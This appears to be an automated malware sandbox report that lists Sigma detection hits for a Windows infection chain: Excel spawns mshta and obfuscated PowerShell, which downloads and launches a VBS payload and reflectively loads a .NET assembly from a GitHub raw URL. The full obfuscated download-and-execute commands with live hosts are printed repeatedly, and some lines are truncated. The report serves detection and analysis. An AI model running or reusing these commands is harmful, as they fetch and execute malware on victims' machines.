                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPW
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3432, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3672, ProcessName: mshta.exe
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3836, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS" , ProcessId: 4028, ProcessName: wscript.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System3
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3836, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.cmdline", ProcessId: 3932, ProcessName: csc.exe
                    Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 213.183.76.21, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3432, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3836, TargetFilename: C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 896, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf", ProcessId: 2556, ProcessName: RegAsm.exe
                    Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3432, Protocol: tcp, SourceIp: 213.183.76.21, SourceIsIpv6: false, SourcePort: 443
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3836, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS" , ProcessId: 4028, ProcessName: wscript.exe
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3836, TargetFilename: C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.cmdline
                    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3432, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))", CommandLine: PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgI
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = 